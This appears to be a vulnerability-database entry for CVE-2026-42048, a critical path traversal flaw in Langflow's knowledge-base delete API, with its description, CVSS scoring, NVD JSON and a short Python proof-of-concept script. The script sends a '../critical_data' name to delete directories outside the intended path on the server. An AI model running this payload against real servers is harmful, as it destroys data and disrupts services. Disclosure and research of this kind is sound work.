Security Vulnerability Report
中文
CVE-2026-42048 CVSS 9.6 CRITICAL

CVE-2026-42048

Published: 2026-05-12 18:17:24
Last Modified: 2026-05-14 12:52:17
Source: [email protected]

Description

Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to 1.9.0, Langflow is vulnerable to Path Traversal in the Knowledge Bases API (DELETE /api/v1/knowledge_bases). This occurs because user-supplied knowledge base names are concatenated directly into file paths without proper sanitization or boundary validation. An authenticated attacker can exploit this flaw to delete arbitrary directories anywhere on the server's filesystem, leading to data loss and potential service disruption. This vulnerability is fixed in 1.9.0.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:* - VULNERABLE
Langflow < 1.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL url = "http://target-host:port/api/v1/knowledge_bases" # Headers with authentication token (Low privilege required) headers = { "Authorization": "Bearer <YOUR_ACCESS_TOKEN>", "Content-Type": "application/json" } # Malicious payload using path traversal to delete a directory # The payload attempts to delete a folder named 'critical_data' located one level up from the expected directory payload = { "name": "../critical_data" } try: response = requests.delete(url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful: Directory deletion requested.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42048", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:23.780", "lastModified": "2026-05-14T12:52:16.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to 1.9.0, Langflow is vulnerable to Path Traversal in the Knowledge Bases API (DELETE /api/v1/knowledge_bases). This occurs because user-supplied knowledge base names are concatenated directly into file paths without proper sanitization or boundary validation. An authenticated attacker can exploit this flaw to delete arbitrary directories anywhere on the server's filesystem, leading to data loss and potential service disruption. This vulnerability is fixed in 1.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.0", "matchCriteriaId": "D51A889E-5C89-4A92-B32B-C91EAF735430"}]}]}], "references": [{"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.